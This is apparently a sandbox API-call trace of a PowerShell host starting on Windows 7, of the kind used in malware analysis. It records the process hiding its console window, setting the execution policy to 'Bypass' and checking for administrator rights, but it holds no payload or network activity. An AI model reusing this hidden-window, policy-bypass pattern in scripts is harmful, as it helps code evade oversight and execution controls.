	[0130.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0130.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0131.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0131.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0131.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0132.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0132.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0133.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x27d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0133.686] SetErrorMode (uMode=0x1) returned 0x1
	[0133.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x27d820 | out: lpFileInformation=0x27d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0133.686] SetErrorMode (uMode=0x1) returned 0x1
	[0142.019] bsearch (_Key=0x27ae00, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0142.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.041] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.041] CoTaskMemFree (pv=0x190070) 
	[0142.044] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.044] CoTaskMemFree (pv=0x190070) 
	[0142.044] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.044] CoTaskMemFree (pv=0x190070) 
	[0142.047] CoCreateGuid (in: pguid=0x27dbe8 | out: pguid=0x27dbe8*(Data1=0x9dfa52be, Data2=0x9686, Data3=0x4acf, Data4=([0]=0xa6, [1]=0xc4, [2]=0x4c, [3]=0xa, [4]=0x59, [5]=0xdd, [6]=0xa1, [7]=0xf6))) returned 0x0
	[0142.049] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.049] CoTaskMemFree (pv=0x190070) 
	[0142.052] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.052] CoTaskMemFree (pv=0x190070) 
	[0142.054] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0142.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.054] CoTaskMemFree (pv=0x190070) 
	[0142.154] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0142.155] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x27d890 | out: lpConsoleScreenBufferInfo=0x27d890) returned 1
	[0142.160] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0142.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x27d890 | out: lpConsoleScreenBufferInfo=0x27d890) returned 1
	[0142.161] GetVersionExW (in: lpVersionInformation=0x27d820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27d820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0142.163] GetCurrentProcess () returned 0xffffffffffffffff
	[0142.164] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x27d8b8 | out: TokenHandle=0x27d8b8*=0x320) returned 1
	[0142.168] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27d7d8 | out: TokenInformation=0x0, ReturnLength=0x27d7d8) returned 0
	[0142.169] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xf38c0
	[0142.169] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xf38c0, TokenInformationLength=0x4, ReturnLength=0x27d7d8 | out: TokenInformation=0xf38c0, ReturnLength=0x27d7d8) returned 1
	[0142.170] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x27d938 | out: phNewToken=0x27d938*=0x31c) returned 1
	[0142.170] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x27d7d8 | out: TokenInformation=0x0, ReturnLength=0x27d7d8) returned 0
	[0142.170] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xf38f0
	[0142.170] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xf38f0, TokenInformationLength=0x4, ReturnLength=0x27d7d8 | out: TokenInformation=0xf38f0, ReturnLength=0x27d7d8) returned 1
	[0142.171] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2e349b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x27d948 | out: IsMember=0x27d948) returned 1
	[0142.171] CloseHandle (hObject=0x31c) returned 1
	[0142.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.373] GetConsoleWindow () returned 0x10282
	[0144.459] ShowWindow (hWnd=0x10282, nCmdShow=0) returned 0
	[0144.462] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0144.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.462] CoTaskMemFree (pv=0x190070) 
	[0144.464] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0144.476] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0144.478] CoCreateGuid (in: pguid=0x27da30 | out: pguid=0x27da30*(Data1=0x4328f50e, Data2=0xa333, Data3=0x40da, Data4=([0]=0x9a, [1]=0x95, [2]=0x66, [3]=0x3c, [4]=0xc9, [5]=0xb4, [6]=0x65, [7]=0xc6))) returned 0x0
	[0144.479] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0144.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.479] CoTaskMemFree (pv=0x190070) 
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.820] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0145.820] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0145.820] CoTaskMemFree (pv=0x190070) 
	[0145.821] CoTaskMemAlloc (cb=0xcc) returned 0x196350
	[0145.821] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x196350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0145.821] CoTaskMemFree (pv=0x196350) 
	[0145.821] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d5a8 | out: phkResult=0x27d5a8*=0x324) returned 0x0
	[0145.821] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d52c, lpData=0x0, lpcbData=0x27d528*=0x0 | out: lpType=0x27d52c*=0x2, lpData=0x0, lpcbData=0x27d528*=0x6c) returned 0x0
	[0145.821] CoTaskMemAlloc (cb=0x70) returned 0x1b8409b0
	[0145.822] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d4fc, lpData=0x1b8409b0, lpcbData=0x27d4f8*=0x6c | out: lpType=0x27d4fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x27d4f8*=0x6c) returned 0x0
	[0145.822] CoTaskMemFree (pv=0x1b8409b0) 
	[0145.822] CoTaskMemAlloc (cb=0xcc) returned 0x196350
	[0145.822] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x196350, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0145.822] CoTaskMemFree (pv=0x196350) 
	[0145.822] CoTaskMemAlloc (cb=0xcc) returned 0x196350
	[0145.822] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x196350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0145.822] CoTaskMemFree (pv=0x196350) 
	[0145.825] RegCloseKey (hKey=0x324) returned 0x0
	[0145.825] CoTaskMemAlloc (cb=0xcc) returned 0x196350
	[0145.825] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x196350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0145.825] CoTaskMemFree (pv=0x196350) 
	[0145.825] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d5a8 | out: phkResult=0x27d5a8*=0x324) returned 0x0
	[0145.825] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d52c, lpData=0x0, lpcbData=0x27d528*=0x0 | out: lpType=0x27d52c*=0x0, lpData=0x0, lpcbData=0x27d528*=0x0) returned 0x2
